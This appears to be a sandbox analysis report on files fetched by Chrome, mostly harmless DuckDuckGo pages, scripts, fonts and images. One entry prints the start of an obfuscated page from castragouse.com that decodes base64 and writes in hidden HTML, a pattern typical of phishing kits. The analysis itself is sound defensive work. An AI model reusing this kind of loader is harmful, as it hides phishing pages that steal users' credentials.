                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 1984 x 1164, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):149591
                                                                                                                                                            Entropy (8bit):7.96734440315515
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:MQ5UHmRkjQu2nzLavwNpRIR4V11GGV4Ov1k5BiZAtdmUDVO4C9:uHmRsQJzLtV6M7oG1k58ZAtah9
                                                                                                                                                            MD5:12617AA39B87128318AEFA6D49468772
                                                                                                                                                            SHA1:32EF23AD418305B6DB993FDD593AE7A12EC4DE7D
                                                                                                                                                            SHA-256:0D808AECD8D2AFEEF070CBE93F79678F89027DEABB5A414DF2421AA7D1C835F4
                                                                                                                                                            SHA-512:9E05220AF715EA5B1233909BEB6D61822481E0B27FCB2742D67A5FA1737C66D32A12D90F2EA15962F3A1D9945D605BC0AA15CE36B3BC61EA32EA934C04D04788
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...............g.....PLTE...@@TGXf-/627HMPi<G^06DKLk5:G.!.5Ah5Cj$)1.&10?_.5M2Ca...0Ba......2@c2<_0=b......1?b0@a.....$.=a.../=a-=^.........1?b.<`/=_....../>a...............................................................................................................................X3...333..........W3.......W2....X3....Y4............fff.......X3...L.<................___..."""ddd'''..3...}}}........3yyyLLL.........)))...???aaa..............sssXXX.b?.........000..ppp.....f.mM.......===......BBB=.,...<.H........_[..?......DDD...666.................r.vYE.5..4...lL...iii...ooo......CY...5lll.kKCX...f.3.c3.2..3..3.tX5.9..4..X.A.i5...s3.F%.....\o..........X.iH..6....m.c...........y.8...YV.HF.G-......OMNc...yr......n.Hd.0..@.nBX.U`....FtRNS....................#...1(&#(+.l.jl..#;WH0.b.G.U......p...r`\..l...+.....D.IDATx.....@..a..7$j.......$.....*.].f2.........I&}...+.v..s..q...Ag......~...h.....xh...........6......N.C.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 192x120, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):10485
                                                                                                                                                            Entropy (8bit):7.946332151589947
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:5kXiyeT4U1JxVbp7Bz0AZQcX54cATkjcARZkEnbYKAhMiXE8/99D:qyrTN0A/AUks7i08
                                                                                                                                                            MD5:5D3CB32D04B0339A0F21948BFCF5AF95
                                                                                                                                                            SHA1:39A773B9A836A29DC598FDC339349BF821DCF16F
                                                                                                                                                            SHA-256:357A46869C008F0FDC08F828AA39B7406204A5FA8C9E1AA954F285A5DC569B96
                                                                                                                                                            SHA-512:20DBE48E5DEF78C2BEA236E5F844D91A5C93C47E21DBCC0BEDF7B93B19496017BBAC76FF6BF8EE183E75B18F596B509E5FB87E1B32B1F0F79528D10A176970B4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/gwvwew_KoIj3OsVAqLa2y4UkHSGJm_hp9BMkEAeb15HEyZHEmXTGVrCN4VB-mElofPRd8dlXSsFHbJPnYu2pbRr9Lg=s192-w192-h120
                                                                                                                                                            Preview:......JFIF......................................................................................................................................................x..............................................A.........................!.1..."AQ.#2a..BUq...R..$Cb...34S......................................9......................!..1AQaq...."2R......rB..3..#$Cs.............?.U..D..\...Z.Y....M.$......./6..9PZm.....F.B.M.BB.M.C.-6. (M6...K.....Hm>..Ci.p.....P.3.*....U..S.......=V....jB.!]..H..Z.....k.....i...6...m...T*.s_[.Rj_H#.....P..{c...s|..P.o.B.T.........Uo.y.H..r5]-]5e]bQ..%.Y.4....."0..P....=..T.66.<.uRZD..I.{...@.8.$...Y.5H.G..I/Nj+......{...T..6....ub../ G]..*.k..."..h.....*.#.S../..J..u.B4.a.d.........xqA.M....M...d.%eZ.UZ...:EaIW[:U..X..I$RIX..2_..n".$^'P-.. .l$_^...0...5SQ..&...........(.C.![..U7.s\....2dHPm&...<. .PZ]....].C.M..T!4.....U.fm\..m....&.V...}EP..j!...QR..BV&}Z....B......y5.B..+~.>..RG..kZ......EQP..7^u.Eu1%.#.^...l4...e.XM...#o......ANN.*.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (41898), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):41976
                                                                                                                                                            Entropy (8bit):5.2316717977889855
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:jRh3Dh4PrG0k+67T5ZRugOK9TMtrEdc2Vm5EN8:jRhB9OUTMtMrV/m
                                                                                                                                                            MD5:B28F31950A08BB7E0F11C1A6056D1FC3
                                                                                                                                                            SHA1:EFFB94B177F8836A85E2992FA278A87CB971FFB3
                                                                                                                                                            SHA-256:85FEB7B2B47B9DEBB664E074E569E44BE66662112B1586907EEE95276E5460DA
                                                                                                                                                            SHA-512:9D5C5BFA497B952FC9AE7C6892F272268C20BB7D2EDB29190E7577B1776BEFB8DAF9ABD5B6250D3C7883CBA695BC7A02D232982C2470B536078BE54B13636264
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/
                                                                                                                                                            Preview:<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=1 , viewport-fit=auto"/><link rel="preload" href="/static-assets/font/ProximaNova-RegIt-webfont.woff2" as="font" type="font/woff2" crossorigin="anonymous"/><link rel="preload" href="/static-assets/font/ProximaNova-ExtraBold-webfont.woff2" as="font" type="font/woff2" crossorigin="anonymous"/><meta name="apple-itunes-app" content="app-id=663592361, app-argument=https://duckduckgo.com/?smartbanner=1"/><noscript><meta http-equiv="refresh" content="0; url=&quot;https://html.duckduckgo.com/html&quot;"/><style>body { display: none }</style></noscript><title>DuckDuckGo . Privacy, simplified.</title><meta name="description" content="The Internet privacy company that empowers you to seamlessly take control of your personal information online, without any tradeoffs."/><meta name="twitter:card" content="summary_large_image"/><meta name="twitter:site" co
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):15552
                                                                                                                                                            Entropy (8bit):7.983966851275127
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                            MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                            SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                            SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                            SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                            Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):15344
                                                                                                                                                            Entropy (8bit):7.984625225844861
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                            MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                            SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                            SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                            SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                            Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (6367), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):6367
                                                                                                                                                            Entropy (8bit):5.305104271229207
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:tRfI6jKMz28pcdn72ab9EuCZ8DJ+KMWnYP6o:tRwUKnpAaEzBK7Yyo
                                                                                                                                                            MD5:5B9849B5BFFC23E25B0F9342E291EA6D
                                                                                                                                                            SHA1:E5B9707D22810606D44B02338005647E0DAFEC70
                                                                                                                                                            SHA-256:EA3AC44FEEF6B745488DCBA5E7D5D2EFD78B2265DFAC082A4AAB6A6878A9484E
                                                                                                                                                            SHA-512:05716B13F06DB7F15E15AECA92075ED4AA3CE1E79E242EB89B7BD9BBAD6723A6FF9C01BF89538628B0243EEB77AFC4B8C465DBE06EACE3C2A8A807B94D8498B8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/41966-c9d76895b4f9358f.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[41966],{94184:function(e,t){var o;!function(){"use strict";var n={}.hasOwnProperty;function r(){for(var e=[],t=0;t<arguments.length;t++){var o=arguments[t];if(o){var a=typeof o;if("string"===a||"number"===a)e.push(o);else if(Array.isArray(o)){if(o.length){var u=r.apply(null,o);u&&e.push(u)}}else if("object"===a){if(o.toString!==Object.prototype.toString&&!o.toString.toString().includes("[native code]")){e.push(o.toString());continue}for(var l in o)n.call(o,l)&&o[l]&&e.push(l)}}}return e.join(" ")}e.exports?(r.default=r,e.exports=r):void 0===(o=function(){return r}.apply(t,[]))||(e.exports=o)}()},44019:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.getDomainLocale=function(e,t,o,n){return!1};("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&"undefined"===typeof t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.ex
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (470), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):470
                                                                                                                                                            Entropy (8bit):5.395422846446089
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:fbjqQ/h0IYsQMDLGqYxAU7rynHtmsaI9QfQ3tTBRX+xVj:fbj7h0IdXbYxAU7rynHt159PtTBRXAp
                                                                                                                                                            MD5:A03AE57406102C64CE925A8A5BBBC4DF
                                                                                                                                                            SHA1:B231A21FC21C7DFCFF2D1BD2AF222280EC6791EF
                                                                                                                                                            SHA-256:D119DB7E362CB2248AA3B0B21D34B27D88AC94626B52EBFC11A55FD379D1389C
                                                                                                                                                            SHA-512:D07FF2F9F66BA4BE754EDE8259449B9267B85AF77277E5D1F3DA3DFB52627147E35C595A4F3CFB074504D1EE0A2A23E74B4187875BB1B0E98B98AE3A398DFA21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[95405],{27955:function(n,u,_){"use strict";_.r(u),_.d(u,{__N_SSG:function(){return r}});var t=_(39040),r=!0;u.default=t.default},89886:function(n,u,_){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return _(27955)}])}},function(n){n.O(0,[41966,43965,49224,81125,53343,36926,62242,49706,20581,84969,56987,4770,69706,49774,92888,40179],(function(){return u=89886,n(n.s=u);var u}));var u=n.O();_N_E=u}]);
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (6537), with CRLF line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):17934
                                                                                                                                                            Entropy (8bit):5.9036740400124605
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:XnuzUB5Z69CrtDVBR/bRZ4dnuzUB5Z69CrtDVBR/bRZ8lrx+lrxt:jB5Z69inPbRGtB5Z69inPbRqlrolr/
                                                                                                                                                            MD5:DA3CD9586BA35880EA2688F0BB977E92
                                                                                                                                                            SHA1:A9005889D491BC39C2D16A98433A457414785A4D
                                                                                                                                                            SHA-256:1E7F0E74ABB84D90CFE3DD347BA271A027D74B3C2ABF2E36AFF4E1A153091EDD
                                                                                                                                                            SHA-512:5258CAB5415F674C0C127B1E7CCF89D0AFF02F9E3AC68E935F3B940E8B378ED4095E3B44798AF14A3F8BEE5503A74120F4AA60F0ADD1BE2A7730993FFFFD6A1E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://gzevp.castragouse.com/fzFA/
                                                                                                                                                            Preview:<script>....if(atob("aHR0cHM6Ly9jbjBZRHJLLmNhc3RyYWdvdXNlLmNvbS9mekZBLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNxaEhqeU5KcXVhIGg0e
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 640 x 410, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):68927
                                                                                                                                                            Entropy (8bit):7.970735838138142
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:y7bBleCJBgler1itO7Kq+eaVxPjUH/F9Wz:ybJBMer1gOdVazPjUH/DWz
                                                                                                                                                            MD5:3A2623C9D68F05083E03559F8BFEA459
                                                                                                                                                            SHA1:2F25089D9F0B609B7571DA62BBE54CC74E78B336
                                                                                                                                                            SHA-256:240140F5BBA4CDA9BB086E51F28988438C4D082E50ADCDFFB27B5EA41A112165
                                                                                                                                                            SHA-512:DFA1737DB9BEBCC6C31DA015039F6C6FE9D79D85E308A3E6F016CCCE6E1453989E6A69759B8C16CA80E3FE899F2FED8AE22AF117D4B5002EE879D836D60CF883
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............h.C....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...`....'y...^.....H..@..Y.tB..{..R..RZ......R..-...+!.I.";v.......{.";.vl....d..t.....o.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ...u...V.....u...y.>.v;..;..vj.........Z..}M....o.......-w.{.y}G.1...;.....vR...."........]}....vR.....{.?_{....I.b.^.jY;.\.w.............r...}z../..B...........G.>.....V.....o"~T....'....l.s....._c.{......v"s...Z.s.'yn.....$=N.:.}G....]s.5!7...^.N.)o....U...8a.....O.o........q.I....I..}.v..n...bBN.|..^H.9.1k..{.c.3.xN.{.}?H.\.^..C.u.{..r..?..`S...p.v..7...'......+.......A..$.X..8..;..'-l?.........v.q..to?.......}sSL.H......
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):11271
                                                                                                                                                            Entropy (8bit):7.9694874537370755
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:JnqqkGv/ErYr5fTd9SsmCPefuipzLa1FyBA+PeUAtna2SKAjA2gYm+IXet0K:J5kGEUrxXz+BamGqepEjZJm+AK
                                                                                                                                                            MD5:E091111B365226756591F79E57EC6789
                                                                                                                                                            SHA1:5FD793C51295D24DEF9CFA5859F904BF145BFA51
                                                                                                                                                            SHA-256:F4921F3DD41C29AE505C934465F47FA31EEB4F2628696782A0C5B5EED83CF0EC
                                                                                                                                                            SHA-512:565BE5889441319B5971A455EB5282E5B432DAA208AA7F76744C01FC856005CE902FD0859B5D0361E79CACC91EA420BC51F8F59667A5653D1E5C61F2BD6A3172
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/chrome-lg.a4859fb2.png
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...+.IDATx..}..]e....!...c$$.)D .(A.$.r....m......k...Z==k.LH...G..]8.8*=>..q......b..b.<L!...G..y...?..?.^.V.R..!u.y...{........2+.2+.2+.2+.2+.2+.2+...E.^..m....=......x*U0D5...]..#. !..Q..7u..4..G....#.4....cF...."....$..<f...D.6)..&.m).2.Bd.0..?&..b^.v..............\.Z.x..ek../".u..uV_....5..A.. ......1I....pX......G'B.U..=....k.f.........P...V...rT.3..q...=...m...D..S.!.|.....S.u..hB.......m..]+.]..To...yzF..........[P....4..o...........m...r............X...w..o.{...W4...!....a.|.._rr/.#....~p..P......g.BW].Z7$...5.,.A.q.......4a;x#A.%3.. .F.."....z.&.U..&kF..4..e...C.2.'76.d..`...Sr.5...... #..#.Z.0$p...uGa.P.7....z..I.aF.@$w..A..L..}\- .T.....E..J...."]4..g.....&<..!.5%....g.L0.#n...X......!......9..mf.H{`...?.....LA.i_..W..09{]kdq.\....|d&..#f...!x}.k..?..coz.5!.].M.7..}.9.|j."RX..m..).K.sXhQry.op.._\.kn...O....# G....^.J....C..m:..q.....{.q.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):331787
                                                                                                                                                            Entropy (8bit):5.517673558177757
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:Q9p1wpYvpvGI8hQp5/d/jDDC0pm4Kn21xIjjOD5QVUTThkuThgDZ/6Ay6o8fgn+U:x9I8hQp5l/W0p+neIj0QVUjKORH
                                                                                                                                                            MD5:C505A47894A6EB41492A13432DB092A7
                                                                                                                                                            SHA1:68CD91140598E3A1ADE7084A912229EBBACE6A24
                                                                                                                                                            SHA-256:9113FF1A7BEEAE3FDE3CD51883AF8745EFBEFF2EE3CEAC7B18D52E7141F7D683
                                                                                                                                                            SHA-512:1ACCC18B85864ADEFCC5E5E884EE7ADC95CE47FE9D7ED93208624E8B2415EA58D70D224B065AC7350C717BEF03048BC44CD9B88BBB54818D698EAD8B4B8E6AEB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[62242],{64289:function(e,t,M){"use strict";var l,c,a=M(67294);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var M=arguments[t];for(var l in M)Object.prototype.hasOwnProperty.call(M,l)&&(e[l]=M[l])}return e},n.apply(this,arguments)}t.Z=function(e){return a.createElement("svg",n({fill:"none",viewBox:"0 0 16 16",xmlns:"http://www.w3.org/2000/svg"},e),l||(l=a.createElement("g",{clipPath:"url(#fewer-ads-color-16_svg__Fewer-Ads-Color-16_svg__a)"},a.createElement("path",{fill:"#F5F5F5",d:"M9.986 0H2.5A2.5 2.5 0 000 2.5v11A2.5 2.5 0 002.5 16h11a2.5 2.5 0 002.5-2.5V8.869a3.078 3.078 0 01-.35.137l-.034.011a3.049 3.049 0 01-.427.098c-.154.027-.338.054-.533.081-.191.027-.399.053-.607.079-.074.617-.16 1.269-.227 1.544l-.003.011c-.055.226-.146.598-.397.87-.328.354-.753.388-1.02.388-.413 0-.791-.146-1.06-.484-.185-.234-.28-.529-.332-.692v-.001l-.011-.034a3.198 3.198 0 01-.094-.43 17.327
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):73885
                                                                                                                                                            Entropy (8bit):4.47347706740797
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:zdrv1lFJUokxJQo13iksyBAL3sbRMR3+j+h+CpeH8aCYRq9Tg343yadgJw:zV1lFyT3ikWp1R9n1
                                                                                                                                                            MD5:5F5108171CBAE8DE0A63C9DB0A1BAC69
                                                                                                                                                            SHA1:895BFDC3D3888C60162C51EF14E7ADD4EABCDFE2
                                                                                                                                                            SHA-256:68BCE3BE6E209365C421794CB26C27BF49D8F967EB16B7FA86D643E216DA7E8B
                                                                                                                                                            SHA-512:19024519F3ADD09373C8088B3E36E860FC188DDAB58576939733573DACE308764DD7D4854213D1FA2C5DFD0F64EC56ED5CC10A4DFC6C648A7F178E2D0DAFCB9F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/webpack-729a400fd7e48c20.js
                                                                                                                                                            Preview:!function(){"use strict";var e={},c={};function b(f){var d=c[f];if(void 0!==d)return d.exports;var a=c[f]={exports:{}},t=!0;try{e[f].call(a.exports,a,a.exports,b),t=!1}finally{t&&delete c[f]}return a.exports}b.m=e,b.amdO={},function(){var e=[];b.O=function(c,f,d,a){if(!f){var t=1/0;for(u=0;u<e.length;u++){f=e[u][0],d=e[u][1],a=e[u][2];for(var n=!0,r=0;r<f.length;r++)(!1&a||t>=a)&&Object.keys(b.O).every((function(e){return b.O[e](f[r])}))?f.splice(r--,1):(n=!1,a<t&&(t=a));if(n){e.splice(u--,1);var o=d();void 0!==o&&(c=o)}}return c}a=a||0;for(var u=e.length;u>0&&e[u-1][2]>a;u--)e[u]=e[u-1];e[u]=[f,d,a]}}(),b.n=function(e){var c=e&&e.__esModule?function(){return e.default}:function(){return e};return b.d(c,{a:c}),c},function(){var e,c=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};b.t=function(f,d){if(1&d&&(f=this(f)),8&d)return f;if("object"===typeof f&&f){if(4&d&&f.__esModule)return f;if(16&d&&"function"===typeof f.then)return f}var a=
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 192x120, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):9362
                                                                                                                                                            Entropy (8bit):7.943684830164114
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:GCioOmQbMrutSrhViyFFHO5jRWBUmUzUIsgaM8wABR:zioOmQbBtSNgqmWBUmyVwR
                                                                                                                                                            MD5:8A9249C4B379F8ED50A50E9CABA2852B
                                                                                                                                                            SHA1:8BC8DD66B97C65D59452122E3703134AE06E787F
                                                                                                                                                            SHA-256:1FB027F6F4BADC2EB5D600B81CF2AF66210825D89E9E595FDC122314BFEE87E8
                                                                                                                                                            SHA-512:3ACB7981A7ACF66A598B34F9DC701AE86219FDF46136BB9602917AE0DE0B18E0A8DA2913EF18885938CE72FC196D0B296A24F0C8E42DDC15452883087E7E8503
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/LtBvUp3Og39KJjwrHuvaqaooDAjOS1drA8yvKNS4X8507y1sm5dYLRtDvr8ddiRjaXUMPIPwrVtWgBWrYUO5y8QM7A=s192-w192-h120
                                                                                                                                                            Preview:......JFIF......................................................................................................................................................x..............................................H..........................!."1...#A...QRTa....2SUt......$4r..cqs...%C..................................G......................!..1..AQ."2a...RSq...s......%35Bb..#$cr...4C...............?.....!t@..U$+.^.U.....YW...Q..>.*......p...QW."..D+.N&....j..@D'..p...QV..MP*........U...z.S.F'..5H.*%O*!qQ).F.*).R...yQ....H..R..}ur...s....s......IW.....T.....p...Q...^.U.{BqqU....U.xj\....Q...D'..5w.C.7......S$2..@..:[."..dq.Pz0.0r........N......'Q.x.o.W...^....`.\...hy+.....yV.x.~..\....8.x..#YQ.Co.hm.....9........Q.$65.....^..m..R..V\...,........1.h........s...R..).K.TP...,C....-.c..b?f....k..5.. ......$./N..%......$..<...v.....2.Ry..$..i.d.....=...{s.*.iQ9..d1.2)c..n.n..Q...p....klN... w.G..UuJ.ii.X....f...KZNS..$.c...X{.mkm..F.J.J...I]9p. ..db.(......,.m,.*4...q.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 60 x 60, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
